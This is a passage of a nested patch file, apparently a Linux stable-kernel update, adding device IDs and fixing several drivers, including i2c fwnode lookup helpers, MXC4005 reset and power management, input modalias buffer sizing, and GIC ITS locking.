+ 	{ .compatible = "elan,ekth6915", .data = &elan_ekth6915_chip_data },
++	{ .compatible = "ilitek,ili9882t", .data = &ilitek_ili9882t_chip_data },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, elan_i2c_hid_of_match);
+diff --git a/drivers/hwtracing/intel_th/pci.c b/drivers/hwtracing/intel_th/pci.c
+index 648893f9e4b67..8dad239aba2ce 100644
+--- a/drivers/hwtracing/intel_th/pci.c
++++ b/drivers/hwtracing/intel_th/pci.c
+@@ -294,6 +294,11 @@ static const struct pci_device_id intel_th_pci_id_table[] = {
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xae24),
+ 		.driver_data = (kernel_ulong_t)&intel_th_2x,
+ 	},
++	{
++		/* Meteor Lake-S */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7f26),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
+ 	{
+ 		/* Raptor Lake-S */
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7a26),
+@@ -304,6 +309,26 @@ static const struct pci_device_id intel_th_pci_id_table[] = {
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xa76f),
+ 		.driver_data = (kernel_ulong_t)&intel_th_2x,
+ 	},
++	{
++		/* Granite Rapids */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x0963),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
++	{
++		/* Granite Rapids SOC */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x3256),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
++	{
++		/* Sapphire Rapids SOC */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x3456),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
++	{
++		/* Lunar Lake */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xa824),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
+ 	{
+ 		/* Alder Lake CPU */
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x466f),
+diff --git a/drivers/i2c/busses/i2c-at91-slave.c b/drivers/i2c/busses/i2c-at91-slave.c
+index d6eeea5166c04..131a67d9d4a68 100644
+--- a/drivers/i2c/busses/i2c-at91-slave.c
++++ b/drivers/i2c/busses/i2c-at91-slave.c
+@@ -106,8 +106,7 @@ static int at91_unreg_slave(struct i2c_client *slave)
+ 
+ static u32 at91_twi_func(struct i2c_adapter *adapter)
+ {
+-	return I2C_FUNC_SLAVE | I2C_FUNC_I2C | I2C_FUNC_SMBUS_EMUL
+-		| I2C_FUNC_SMBUS_READ_BLOCK_DATA;
++	return I2C_FUNC_SLAVE;
+ }
+ 
+ static const struct i2c_algorithm at91_twi_algorithm_slave = {
+diff --git a/drivers/i2c/busses/i2c-designware-slave.c b/drivers/i2c/busses/i2c-designware-slave.c
+index 0d15f4c1e9f7e..5b54a9b9ed1a3 100644
+--- a/drivers/i2c/busses/i2c-designware-slave.c
++++ b/drivers/i2c/busses/i2c-designware-slave.c
+@@ -232,7 +232,7 @@ static const struct i2c_algorithm i2c_dw_algo = {
+ 
+ void i2c_dw_configure_slave(struct dw_i2c_dev *dev)
+ {
+-	dev->functionality = I2C_FUNC_SLAVE | DW_IC_DEFAULT_FUNCTIONALITY;
++	dev->functionality = I2C_FUNC_SLAVE;
+ 
+ 	dev->slave_cfg = DW_IC_CON_RX_FIFO_FULL_HLD_CTRL |
+ 			 DW_IC_CON_RESTART_EN | DW_IC_CON_STOP_DET_IFADDRESSED;
+diff --git a/drivers/i2c/i2c-core-acpi.c b/drivers/i2c/i2c-core-acpi.c
+index 4dd777cc0c89f..14ae0cfc325ef 100644
+--- a/drivers/i2c/i2c-core-acpi.c
++++ b/drivers/i2c/i2c-core-acpi.c
+@@ -442,18 +442,12 @@ EXPORT_SYMBOL_GPL(i2c_acpi_find_adapter_by_handle);
+ 
+ static struct i2c_client *i2c_acpi_find_client_by_adev(struct acpi_device *adev)
+ {
+-	struct device *dev;
+-	struct i2c_client *client;
+-
+-	dev = bus_find_device_by_acpi_dev(&i2c_bus_type, adev);
+-	if (!dev)
+-		return NULL;
+-
+-	client = i2c_verify_client(dev);
+-	if (!client)
+-		put_device(dev);
++	return i2c_find_device_by_fwnode(acpi_fwnode_handle(adev));
++}
+ 
+-	return client;
++static struct i2c_adapter *i2c_acpi_find_adapter_by_adev(struct acpi_device *adev)
++{
++	return i2c_find_adapter_by_fwnode(acpi_fwnode_handle(adev));
+ }
+ 
+ static int i2c_acpi_notify(struct notifier_block *nb, unsigned long value,
+@@ -482,11 +476,17 @@ static int i2c_acpi_notify(struct notifier_block *nb, unsigned long value,
+ 			break;
+ 
+ 		client = i2c_acpi_find_client_by_adev(adev);
+-		if (!client)
+-			break;
++		if (client) {
++			i2c_unregister_device(client);
++			put_device(&client->dev);
++		}
++
++		adapter = i2c_acpi_find_adapter_by_adev(adev);
++		if (adapter) {
++			acpi_unbind_one(&adapter->dev);
++			put_device(&adapter->dev);
++		}
+ 
+-		i2c_unregister_device(client);
+-		put_device(&client->dev);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 1ebc953799149..8af82f42af30b 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -1017,6 +1017,35 @@ void i2c_unregister_device(struct i2c_client *client)
+ }
+ EXPORT_SYMBOL_GPL(i2c_unregister_device);
+ 
++/**
++ * i2c_find_device_by_fwnode() - find an i2c_client for the fwnode
++ * @fwnode: &struct fwnode_handle corresponding to the &struct i2c_client
++ *
++ * Look up and return the &struct i2c_client corresponding to the @fwnode.
++ * If no client can be found, or @fwnode is NULL, this returns NULL.
++ *
++ * The user must call put_device(&client->dev) once done with the i2c client.
++ */
++struct i2c_client *i2c_find_device_by_fwnode(struct fwnode_handle *fwnode)
++{
++	struct i2c_client *client;
++	struct device *dev;
++
++	if (!fwnode)
++		return NULL;
++
++	dev = bus_find_device_by_fwnode(&i2c_bus_type, fwnode);
++	if (!dev)
++		return NULL;
++
++	client = i2c_verify_client(dev);
++	if (!client)
++		put_device(dev);
++
++	return client;
++}
++EXPORT_SYMBOL(i2c_find_device_by_fwnode);
++
+ 
+ static const struct i2c_device_id dummy_id[] = {
+ 	{ "dummy", 0 },
+@@ -1767,6 +1796,75 @@ int devm_i2c_add_adapter(struct device *dev, struct i2c_adapter *adapter)
+ }
+ EXPORT_SYMBOL_GPL(devm_i2c_add_adapter);
+ 
++static int i2c_dev_or_parent_fwnode_match(struct device *dev, const void *data)
++{
++	if (dev_fwnode(dev) == data)
++		return 1;
++
++	if (dev->parent && dev_fwnode(dev->parent) == data)
++		return 1;
++
++	return 0;
++}
++
++/**
++ * i2c_find_adapter_by_fwnode() - find an i2c_adapter for the fwnode
++ * @fwnode: &struct fwnode_handle corresponding to the &struct i2c_adapter
++ *
++ * Look up and return the &struct i2c_adapter corresponding to the @fwnode.
++ * If no adapter can be found, or @fwnode is NULL, this returns NULL.
++ *
++ * The user must call put_device(&adapter->dev) once done with the i2c adapter.
++ */
++struct i2c_adapter *i2c_find_adapter_by_fwnode(struct fwnode_handle *fwnode)
++{
++	struct i2c_adapter *adapter;
++	struct device *dev;
++
++	if (!fwnode)
++		return NULL;
++
++	dev = bus_find_device(&i2c_bus_type, NULL, fwnode,
++			      i2c_dev_or_parent_fwnode_match);
++	if (!dev)
++		return NULL;
++
++	adapter = i2c_verify_adapter(dev);
++	if (!adapter)
++		put_device(dev);
++
++	return adapter;
++}
++EXPORT_SYMBOL(i2c_find_adapter_by_fwnode);
++
++/**
++ * i2c_get_adapter_by_fwnode() - find an i2c_adapter for the fwnode
++ * @fwnode: &struct fwnode_handle corresponding to the &struct i2c_adapter
++ *
++ * Look up and return the &struct i2c_adapter corresponding to the @fwnode,
++ * and increment the adapter module's use count. If no adapter can be found,
++ * or @fwnode is NULL, this returns NULL.
++ *
++ * The user must call i2c_put_adapter(adapter) once done with the i2c adapter.
++ * Note that this is different from i2c_find_adapter_by_fwnode().
++ */
++struct i2c_adapter *i2c_get_adapter_by_fwnode(struct fwnode_handle *fwnode)
++{
++	struct i2c_adapter *adapter;
++
++	adapter = i2c_find_adapter_by_fwnode(fwnode);
++	if (!adapter)
++		return NULL;
++
++	if (!try_module_get(adapter->owner)) {
++		put_device(&adapter->dev);
++		adapter = NULL;
++	}
++
++	return adapter;
++}
++EXPORT_SYMBOL(i2c_get_adapter_by_fwnode);
++
+ static void i2c_parse_timing(struct device *dev, char *prop_name, u32 *cur_val_p,
+ 			    u32 def_val, bool use_def)
+ {
+diff --git a/drivers/i2c/i2c-core-of.c b/drivers/i2c/i2c-core-of.c
+index 1073f82d5dd47..545436b7dd535 100644
+--- a/drivers/i2c/i2c-core-of.c
++++ b/drivers/i2c/i2c-core-of.c
+@@ -113,72 +113,6 @@ void of_i2c_register_devices(struct i2c_adapter *adap)
+ 	of_node_put(bus);
+ }
+ 
+-static int of_dev_or_parent_node_match(struct device *dev, const void *data)
+-{
+-	if (dev->of_node == data)
+-		return 1;
+-
+-	if (dev->parent)
+-		return dev->parent->of_node == data;
+-
+-	return 0;
+-}
+-
+-/* must call put_device() when done with returned i2c_client device */
+-struct i2c_client *of_find_i2c_device_by_node(struct device_node *node)
+-{
+-	struct device *dev;
+-	struct i2c_client *client;
+-
+-	dev = bus_find_device_by_of_node(&i2c_bus_type, node);
+-	if (!dev)
+-		return NULL;
+-
+-	client = i2c_verify_client(dev);
+-	if (!client)
+-		put_device(dev);
+-
+-	return client;
+-}
+-EXPORT_SYMBOL(of_find_i2c_device_by_node);
+-
+-/* must call put_device() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_find_i2c_adapter_by_node(struct device_node *node)
+-{
+-	struct device *dev;
+-	struct i2c_adapter *adapter;
+-
+-	dev = bus_find_device(&i2c_bus_type, NULL, node,
+-			      of_dev_or_parent_node_match);
+-	if (!dev)
+-		return NULL;
+-
+-	adapter = i2c_verify_adapter(dev);
+-	if (!adapter)
+-		put_device(dev);
+-
+-	return adapter;
+-}
+-EXPORT_SYMBOL(of_find_i2c_adapter_by_node);
+-
+-/* must call i2c_put_adapter() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_get_i2c_adapter_by_node(struct device_node *node)
+-{
+-	struct i2c_adapter *adapter;
+-
+-	adapter = of_find_i2c_adapter_by_node(node);
+-	if (!adapter)
+-		return NULL;
+-
+-	if (!try_module_get(adapter->owner)) {
+-		put_device(&adapter->dev);
+-		adapter = NULL;
+-	}
+-
+-	return adapter;
+-}
+-EXPORT_SYMBOL(of_get_i2c_adapter_by_node);
+-
+ static const struct of_device_id*
+ i2c_of_match_device_sysfs(const struct of_device_id *matches,
+ 				  struct i2c_client *client)
+diff --git a/drivers/iio/accel/mxc4005.c b/drivers/iio/accel/mxc4005.c
+index ffae30e5eb5be..0ae544aaff0cc 100644
+--- a/drivers/iio/accel/mxc4005.c
++++ b/drivers/iio/accel/mxc4005.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014, Intel Corporation.
+  */
+ 
++#include <linux/delay.h>
+ #include <linux/module.h>
+ #include <linux/i2c.h>
+ #include <linux/iio/iio.h>
+@@ -36,6 +37,7 @@
+ 
+ #define MXC4005_REG_INT_CLR1		0x01
+ #define MXC4005_REG_INT_CLR1_BIT_DRDYC	0x01
++#define MXC4005_REG_INT_CLR1_SW_RST	0x10
+ 
+ #define MXC4005_REG_CONTROL		0x0D
+ #define MXC4005_REG_CONTROL_MASK_FSR	GENMASK(6, 5)
+@@ -43,6 +45,9 @@
+ 
+ #define MXC4005_REG_DEVICE_ID		0x0E
+ 
++/* Datasheet does not specify a reset time; this is a conservative guess */
++#define MXC4005_RESET_TIME_US		2000
++
+ enum mxc4005_axis {
+ 	AXIS_X,
+ 	AXIS_Y,
+@@ -66,6 +71,8 @@ struct mxc4005_data {
+ 		s64 timestamp __aligned(8);
+ 	} scan;
+ 	bool trigger_enabled;
++	unsigned int control;
++	unsigned int int_mask1;
+ };
+ 
+ /*
+@@ -349,6 +356,7 @@ static int mxc4005_set_trigger_state(struct iio_trigger *trig,
+ 		return ret;
+ 	}
+ 
++	data->int_mask1 = val;
+ 	data->trigger_enabled = state;
+ 	mutex_unlock(&data->mutex);
+ 
+@@ -384,6 +392,13 @@ static int mxc4005_chip_init(struct mxc4005_data *data)
+ 
+ 	dev_dbg(data->dev, "MXC4005 chip id %02x\n", reg);
+ 
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_CLR1,
++			   MXC4005_REG_INT_CLR1_SW_RST);
++	if (ret < 0)
++		return dev_err_probe(data->dev, ret, "resetting chip\n");
++
++	fsleep(MXC4005_RESET_TIME_US);
++
+ 	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK0, 0);
+ 	if (ret < 0)
+ 		return dev_err_probe(data->dev, ret, "writing INT_MASK0\n");
+@@ -480,6 +495,58 @@ static int mxc4005_probe(struct i2c_client *client,
+ 	return devm_iio_device_register(&client->dev, indio_dev);
+ }
+ 
++static int mxc4005_suspend(struct device *dev)
++{
++	struct iio_dev *indio_dev = dev_get_drvdata(dev);
++	struct mxc4005_data *data = iio_priv(indio_dev);
++	int ret;
++
++	/* Save control to restore it on resume */
++	ret = regmap_read(data->regmap, MXC4005_REG_CONTROL, &data->control);
++	if (ret < 0)
++		dev_err(data->dev, "failed to read reg_control\n");
++
++	return ret;
++}
++
++static int mxc4005_resume(struct device *dev)
++{
++	struct iio_dev *indio_dev = dev_get_drvdata(dev);
++	struct mxc4005_data *data = iio_priv(indio_dev);
++	int ret;
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_CLR1,
++			   MXC4005_REG_INT_CLR1_SW_RST);
++	if (ret) {
++		dev_err(data->dev, "failed to reset chip: %d\n", ret);
++		return ret;
++	}
++
++	fsleep(MXC4005_RESET_TIME_US);
++
++	ret = regmap_write(data->regmap, MXC4005_REG_CONTROL, data->control);
++	if (ret) {
++		dev_err(data->dev, "failed to restore control register\n");
++		return ret;
++	}
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK0, 0);
++	if (ret) {
++		dev_err(data->dev, "failed to restore interrupt 0 mask\n");
++		return ret;
++	}
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1, data->int_mask1);
++	if (ret) {
++		dev_err(data->dev, "failed to restore interrupt 1 mask\n");
++		return ret;
++	}
++
++	return 0;
++}
++
++static DEFINE_SIMPLE_DEV_PM_OPS(mxc4005_pm_ops, mxc4005_suspend, mxc4005_resume);
++
+ static const struct acpi_device_id mxc4005_acpi_match[] = {
+ 	{"MXC4005",	0},
+ 	{"MXC6655",	0},
+@@ -487,6 +554,13 @@ static const struct acpi_device_id mxc4005_acpi_match[] = {
+ };
+ MODULE_DEVICE_TABLE(acpi, mxc4005_acpi_match);
+ 
++static const struct of_device_id mxc4005_of_match[] = {
++	{ .compatible = "memsic,mxc4005", },
++	{ .compatible = "memsic,mxc6655", },
++	{ },
++};
++MODULE_DEVICE_TABLE(of, mxc4005_of_match);
++
+ static const struct i2c_device_id mxc4005_id[] = {
+ 	{"mxc4005",	0},
+ 	{"mxc6655",	0},
+@@ -498,6 +572,8 @@ static struct i2c_driver mxc4005_driver = {
+ 	.driver = {
+ 		.name = MXC4005_DRV_NAME,
+ 		.acpi_match_table = ACPI_PTR(mxc4005_acpi_match),
++		.of_match_table = mxc4005_of_match,
++		.pm = pm_sleep_ptr(&mxc4005_pm_ops),
+ 	},
+ 	.probe		= mxc4005_probe,
+ 	.id_table	= mxc4005_id,
+diff --git a/drivers/iio/adc/ad9467.c b/drivers/iio/adc/ad9467.c
+index 811525857d29f..5edc2a3e687db 100644
+--- a/drivers/iio/adc/ad9467.c
++++ b/drivers/iio/adc/ad9467.c
+@@ -223,11 +223,11 @@ static void __ad9467_get_scale(struct adi_axi_adc_conv *conv, int index,
+ }
+ 
+ static const struct iio_chan_spec ad9434_channels[] = {
+-	AD9467_CHAN(0, 0, 12, 'S'),
++	AD9467_CHAN(0, 0, 12, 's'),
+ };
+ 
+ static const struct iio_chan_spec ad9467_channels[] = {
+-	AD9467_CHAN(0, 0, 16, 'S'),
++	AD9467_CHAN(0, 0, 16, 's'),
+ };
+ 
+ static const struct ad9467_chip_info ad9467_chip_tbl[] = {
+diff --git a/drivers/iio/dac/ad5592r-base.c b/drivers/iio/dac/ad5592r-base.c
+index 7a9b5fc1e5794..aa5b4c4aff38b 100644
+--- a/drivers/iio/dac/ad5592r-base.c
++++ b/drivers/iio/dac/ad5592r-base.c
+@@ -410,7 +410,7 @@ static int ad5592r_read_raw(struct iio_dev *iio_dev,
+ 			s64 tmp = *val * (3767897513LL / 25LL);
+ 			*val = div_s64_rem(tmp, 1000000000LL, val2);
+ 
+-			return IIO_VAL_INT_PLUS_MICRO;
++			return IIO_VAL_INT_PLUS_NANO;
+ 		}
+ 
+ 		mutex_lock(&st->lock);
+diff --git a/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c b/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c
+index c3f433ad3af6b..7a0f5cfd9417f 100644
+--- a/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c
++++ b/drivers/iio/imu/inv_icm42600/inv_icm42600_accel.c
+@@ -128,10 +128,6 @@ static int inv_icm42600_accel_update_scan_mode(struct iio_dev *indio_dev,
+ 	/* update data FIFO write */
+ 	inv_icm42600_timestamp_apply_odr(ts, 0, 0, 0);
+ 	ret = inv_icm42600_buffer_set_fifo_en(st, fifo_en | st->fifo.en);
+-	if (ret)
+-		goto out_unlock;
+-
+-	ret = inv_icm42600_buffer_update_watermark(st);
+ 
+ out_unlock:
+ 	mutex_unlock(&st->lock);
+diff --git a/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c b/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c
+index 9d94a8518e3ca..4fb796e11486f 100644
+--- a/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c
++++ b/drivers/iio/imu/inv_icm42600/inv_icm42600_gyro.c
+@@ -128,10 +128,6 @@ static int inv_icm42600_gyro_update_scan_mode(struct iio_dev *indio_dev,
+ 	/* update data FIFO write */
+ 	inv_icm42600_timestamp_apply_odr(ts, 0, 0, 0);
+ 	ret = inv_icm42600_buffer_set_fifo_en(st, fifo_en | st->fifo.en);
+-	if (ret)
+-		goto out_unlock;
+-
+-	ret = inv_icm42600_buffer_update_watermark(st);
+ 
+ out_unlock:
+ 	mutex_unlock(&st->lock);
+diff --git a/drivers/input/input.c b/drivers/input/input.c
+index 8b6a922f84702..78be582b5766d 100644
+--- a/drivers/input/input.c
++++ b/drivers/input/input.c
+@@ -1374,19 +1374,19 @@ static int input_print_modalias_bits(char *buf, int size,
+ 				     char name, unsigned long *bm,
+ 				     unsigned int min_bit, unsigned int max_bit)
+ {
+-	int len = 0, i;
++	int bit = min_bit;
++	int len = 0;
+ 
+ 	len += snprintf(buf, max(size, 0), "%c", name);
+-	for (i = min_bit; i < max_bit; i++)
+-		if (bm[BIT_WORD(i)] & BIT_MASK(i))
+-			len += snprintf(buf + len, max(size - len, 0), "%X,", i);
++	for_each_set_bit_from(bit, bm, max_bit)
++		len += snprintf(buf + len, max(size - len, 0), "%X,", bit);
+ 	return len;
+ }
+ 
+-static int input_print_modalias(char *buf, int size, struct input_dev *id,
+-				int add_cr)
++static int input_print_modalias_parts(char *buf, int size, int full_len,
++				      struct input_dev *id)
+ {
+-	int len;
++	int len, klen, remainder, space;
+ 
+ 	len = snprintf(buf, max(size, 0),
+ 		       "input:b%04Xv%04Xp%04Xe%04X-",
+@@ -1395,8 +1395,48 @@ static int input_print_modalias(char *buf, int size, struct input_dev *id,
+ 
+ 	len += input_print_modalias_bits(buf + len, size - len,
+ 				'e', id->evbit, 0, EV_MAX);
+-	len += input_print_modalias_bits(buf + len, size - len,
++
++	/*
++	 * Calculate the remaining space in the buffer making sure we
++	 * have room for the terminating 0.
++	 */
++	space = max(size - (len + 1), 0);
++
++	klen = input_print_modalias_bits(buf + len, size - len,
+ 				'k', id->keybit, KEY_MIN_INTERESTING, KEY_MAX);
++	len += klen;
++
++	/*
++	 * If we have more data than we can fit in the buffer, check
++	 * if we can trim key data to fit in the rest. We will indicate
++	 * that key data is incomplete by adding a "+" sign at the end, like
++	 * this: "k1,2,3,45,+,".
++	 *
++	 * Note that the shortest key info (if present) is "k+," so we
++	 * can only try to trim if key data is longer than that.
++	 */
++	if (full_len && size < full_len + 1 && klen > 3) {
++		remainder = full_len - len;
++		/*
++		 * We can only trim if we have space for the remainder
++		 * and also for at least "k+," which is 3 more characters.
++		 */
++		if (remainder <= space - 3) {
++			/*
++			 * We are guaranteed to have 'k' in the buffer, so
++			 * we need at least 3 additional bytes for storing
++			 * "+," in addition to the remainder.
++			 */
++			for (int i = size - 1 - remainder - 3; i >= 0; i--) {
++				if (buf[i] == 'k' || buf[i] == ',') {
++					strcpy(buf + i + 1, "+,");
++					len = i + 3; /* Not counting '\0' */
++					break;
++				}
++			}
++		}
++	}
++
+ 	len += input_print_modalias_bits(buf + len, size - len,
+ 				'r', id->relbit, 0, REL_MAX);
+ 	len += input_print_modalias_bits(buf + len, size - len,
+@@ -1412,12 +1452,25 @@ static int input_print_modalias(char *buf, int size, struct input_dev *id,
+ 	len += input_print_modalias_bits(buf + len, size - len,
+ 				'w', id->swbit, 0, SW_MAX);
+ 
+-	if (add_cr)
+-		len += snprintf(buf + len, max(size - len, 0), "\n");
+-
+ 	return len;
+ }
+ 
++static int input_print_modalias(char *buf, int size, struct input_dev *id)
++{
++	int full_len;
++
++	/*
++	 * Printing is done in 2 passes: the first one figures out the total
++	 * length needed for the modalias string, the second one tries to trim
++	 * key data when the buffer is too small for the entire modalias.
++	 * If the buffer is too small regardless, it will fill as much as it
++	 * can (without trimming key data) into the buffer and leave it to
++	 * the caller to figure out what to do with the result.
++	 */
++	full_len = input_print_modalias_parts(NULL, 0, 0, id);
++	return input_print_modalias_parts(buf, size, full_len, id);
++}
++
+ static ssize_t input_dev_show_modalias(struct device *dev,
+ 				       struct device_attribute *attr,
+ 				       char *buf)
+@@ -1425,7 +1478,9 @@ static ssize_t input_dev_show_modalias(struct device *dev,
+ 	struct input_dev *id = to_input_dev(dev);
+ 	ssize_t len;
+ 
+-	len = input_print_modalias(buf, PAGE_SIZE, id, 1);
++	len = input_print_modalias(buf, PAGE_SIZE, id);
++	if (len < PAGE_SIZE - 2)
++		len += snprintf(buf + len, PAGE_SIZE - len, "\n");
+ 
+ 	return min_t(int, len, PAGE_SIZE);
+ }
+@@ -1637,6 +1692,23 @@ static int input_add_uevent_bm_var(struct kobj_uevent_env *env,
+ 	return 0;
+ }
+ 
++/*
++ * This is a pretty gross hack. When building uevent data the driver core
++ * may try adding more environment variables to kobj_uevent_env without
++ * telling us, so we have no idea how much of the buffer we can use to
++ * avoid overflows/-ENOMEM elsewhere. To work around this let's artificially
++ * reduce the amount of memory we will use for the modalias environment variable.
++ *
++ * The potential additions are:
++ *
++ * SEQNUM=18446744073709551615 - (%llu - 28 bytes)
++ * HOME=/ (6 bytes)
++ * PATH=/sbin:/bin:/usr/sbin:/usr/bin (34 bytes)
++ *
++ * 68 bytes total. Allow extra buffer - 96 bytes
++ */
++#define UEVENT_ENV_EXTRA_LEN	96
++
+ static int input_add_uevent_modalias_var(struct kobj_uevent_env *env,
+ 					 struct input_dev *dev)
+ {
+@@ -1646,9 +1718,11 @@ static int input_add_uevent_modalias_var(struct kobj_uevent_env *env,
+ 		return -ENOMEM;
+ 
+ 	len = input_print_modalias(&env->buf[env->buflen - 1],
+-				   sizeof(env->buf) - env->buflen,
+-				   dev, 0);
+-	if (len >= (sizeof(env->buf) - env->buflen))
++				   (int)sizeof(env->buf) - env->buflen -
++					UEVENT_ENV_EXTRA_LEN,
++				   dev);
++	if (len >= ((int)sizeof(env->buf) - env->buflen -
++					UEVENT_ENV_EXTRA_LEN))
+ 		return -ENOMEM;
+ 
+ 	env->buflen += len;
+diff --git a/drivers/iommu/amd/init.c b/drivers/iommu/amd/init.c
+index cc94ac6662339..c9598c506ff94 100644
+--- a/drivers/iommu/amd/init.c
++++ b/drivers/iommu/amd/init.c
+@@ -1655,8 +1655,17 @@ static void __init free_pci_segments(void)
+ 	}
+ }
+ 
++static void __init free_sysfs(struct amd_iommu *iommu)
++{
++	if (iommu->iommu.dev) {
++		iommu_device_unregister(&iommu->iommu);
++		iommu_device_sysfs_remove(&iommu->iommu);
++	}
++}
++
+ static void __init free_iommu_one(struct amd_iommu *iommu)
+ {
++	free_sysfs(iommu);
+ 	free_cwwb_sem(iommu);
+ 	free_command_buffer(iommu);
+ 	free_event_buffer(iommu);
+diff --git a/drivers/irqchip/irq-gic-v3-its.c b/drivers/irqchip/irq-gic-v3-its.c
+index f9ab5cfc9b947..3620bdb5200f2 100644
+--- a/drivers/irqchip/irq-gic-v3-its.c
++++ b/drivers/irqchip/irq-gic-v3-its.c
+@@ -1837,28 +1837,22 @@ static int its_vlpi_map(struct irq_data *d, struct its_cmd_info *info)
+ {
+ 	struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 	u32 event = its_get_event_id(d);
+-	int ret = 0;
+ 
+ 	if (!info->map)
+ 		return -EINVAL;
+ 
+-	raw_spin_lock(&its_dev->event_map.vlpi_lock);
+-
+ 	if (!its_dev->event_map.vm) {
+ 		struct its_vlpi_map *maps;
+ 
+ 		maps = kcalloc(its_dev->event_map.nr_lpis, sizeof(*maps),
+ 			       GFP_ATOMIC);
+-		if (!maps) {
+-			ret = -ENOMEM;
+-			goto out;
+-		}
++		if (!maps)
++			return -ENOMEM;
+ 
+ 		its_dev->event_map.vm = info->map->vm;
+ 		its_dev->event_map.vlpi_maps = maps;
+ 	} else if (its_dev->event_map.vm != info->map->vm) {
+-		ret = -EINVAL;
+-		goto out;
++		return -EINVAL;
+ 	}
+ 
+ 	/* Get our private copy of the mapping information */
+@@ -1890,46 +1884,32 @@ static int its_vlpi_map(struct irq_data *d, struct its_cmd_info *info)
+ 		its_dev->event_map.nr_vlpis++;
+ 	}
+ 
+-out:
+-	raw_spin_unlock(&its_dev->event_map.vlpi_lock);
+-	return ret;
++	return 0;
+ }
+ 
+ static int its_vlpi_get(struct irq_data *d, struct its_cmd_info *info)
+ {
+ 	struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 	struct its_vlpi_map *map;
+-	int ret = 0;
+-
+-	raw_spin_lock(&its_dev->event_map.vlpi_lock);
+ 
+ 	map = get_vlpi_map(d);
+ 
+-	if (!its_dev->event_map.vm || !map) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
++	if (!its_dev->event_map.vm || !map)
++		return -EINVAL;
+ 
+ 	/* Copy our mapping information to the incoming request */
+ 	*info->map = *map;
+ 
+-out:
+-	raw_spin_unlock(&its_dev->event_map.vlpi_lock);
+-	return ret;
++	return 0;
+ }
+ 
+ static int its_vlpi_unmap(struct irq_data *d)
+ {
+ 	struct its_device *its_dev = irq_data_get_irq_chip_data(d);
+ 	u32 event = its_get_event_id(d);
+-	int ret = 0;
+-
+-	raw_spin_lock(&its_dev->event_map.vlpi_lock);
+ 
+-	if (!its_dev->event_map.vm || !irqd_is_forwarded_to_vcpu(d)) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
++	if (!its_dev->event_map.vm || !irqd_is_forwarded_to_vcpu(d))
++		return -EINVAL;
+ 
+ 	/* Drop the virtual mapping */
+ 	its_send_discard(its_dev, event);
+@@ -1953,9 +1933,7 @@ static int its_vlpi_unmap(struct irq_data *d)
+ 		kfree(its_dev->event_map.vlpi_maps);
+ 	}
+ 
+-out:
+-	raw_spin_unlock(&its_dev->event_map.vlpi_lock);
+-	return ret;
++	return 0;
+ }
+ 
+ static int its_vlpi_prop_update(struct irq_data *d, struct its_cmd_info *info)
+@@ -1983,6 +1961,8 @@ static int its_irq_set_vcpu_affinity(struct irq_data *d, void *vcpu_info)
+ 	if (!is_v4(its_dev->its))
+ 		return -EINVAL;
+ 
++	guard(raw_spinlock_irq)(&its_dev->event_map.vlpi_lock);
++
+ 	/* Unmap request? */
+ 	if (!info)
+ 		return its_vlpi_unmap(d);
+diff --git a/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c b/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c
+index 32af2b14ff344..34c9be437432a 100644
+--- a/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c
++++ b/drivers/misc/mchp_pci1xxxx/mchp_pci1xxxx_gp.c
+@@ -69,8 +69,10 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
+ 
+ 	aux_bus->aux_device_wrapper[1] = kzalloc(sizeof(*aux_bus->aux_device_wrapper[1]),
+ 						 GFP_KERNEL);
+-	if (!aux_bus->aux_device_wrapper[1])
+-		return -ENOMEM;
++	if (!aux_bus->aux_device_wrapper[1]) {
++		retval = -ENOMEM;
++		goto err_aux_dev_add_0;
++	}
+ 
+ 	retval = ida_alloc(&gp_client_ida, GFP_KERNEL);
+ 	if (retval < 0)
+@@ -111,6 +113,7 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
+ 
+ err_aux_dev_add_1:
+ 	auxiliary_device_uninit(&aux_bus->aux_device_wrapper[1]->aux_dev);
++	goto err_aux_dev_add_0;
+ 
+ err_aux_dev_init_1:
+ 	ida_free(&gp_client_ida, aux_bus->aux_device_wrapper[1]->aux_dev.id);
+@@ -120,6 +123,7 @@ static int gp_aux_bus_probe(struct pci_dev *pdev, const struct pci_device_id *id
